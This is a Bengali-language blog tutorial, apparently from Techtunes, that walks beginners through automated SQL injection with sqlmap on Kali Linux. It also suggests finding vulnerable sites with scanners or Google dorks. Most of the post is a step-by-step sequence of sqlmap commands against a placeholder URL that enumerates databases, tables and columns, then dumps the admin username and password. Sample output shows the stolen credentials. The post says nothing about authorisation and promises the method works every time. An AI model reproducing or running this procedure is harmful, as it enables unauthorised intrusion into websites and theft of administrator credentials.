আসসালামু আলাইকুম !! কেমন আছেন সবাই ? আমি Emran আছি আপনাদের সাথে !! আজ আমরা শিখবো Sqlmap দিয়ে কিভাবে auto SQL injection করে ওয়েবসাইট এর ডাটাবেস থেকে এডমিন এর ইউজার নেম এবং পাসওয়ার্ড বের করতে হয় !
ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !
আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান ! কোনো সাইট SQL Injection এর যোগ্য কিনা তা জানতে Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যবহার করতে পারেন !
অথবা গুগল ডর্ক ব্যবহার করতে পারেন !!
আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পেয়েছেন যেটা SQL Injection এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !
তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : http://www.yoursite.com/index.php?id=32 !
এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !
তাহলে আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32 --dbs
তারপর
আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !
উদাহরন ১ : Scan all directory (Y/n) Y বড় হাতের তাহলে Y লিখে Enter চাপুন !
উদাহরন ২ : Cancle Scane (y/N) N বড় হাতের তাহলে N লিখে Enter চাপুন !
কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !
এমন :
*information_schema
*yoursite
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite --tables
ভেঙ্গে বলতে হবে ??
টেবিল পাবো এমন :
user
files
admin
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin --columns
কলাম পাবো এমন :
admin_username
admin_password
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username --dump
[ Username ]
[ ]
[ BOLOD ]
[ ]
একই ভাবে পাসওয়ার্ড বের করব :
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password --dump
[ Password ]
[ ]
[ 123456 ]
[ ]
কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !
এটা একদম নতুনদের জন্য নয় ! আর ট্রাই না করে " কাজ করে না এই সেই " টিউমেন্ট করবেন না দয়া করে ! আগে ট্রাই করুন ১০০% কাজ করবে !
আমাকে ফেসবুকে ফলো করতে পারেন : Emran সবাইকে ধন্যবাদ !
Do Not Copy ! Copying Don't Make You Writer ! 😉
কেমন লাগলো জানাবেন !! ধন্যবাদ !
আমি ইমরান হোসাইন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 13 টি টিউন ও 46 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
আসসালামু-আলাইকুম ! আমি মোঃ ইমরান হোসাইন । আমি University Of Asia Pacific এ CSE তে পড়ি ! হ্যাকিং - ক্র্যাকিং নিয়ে আমার খুব আগ্রহ সেই থেকে আপনাদের জন্য আমার লিখা (আমি হ্যাকার না ) ! শুধুই একজন শিক্ষার্থী ! যাদের এসব আমার মতো ভালো লাগে তারা আমার পোষ্ট নিয়মিত পড়বেন...
thanks i will try it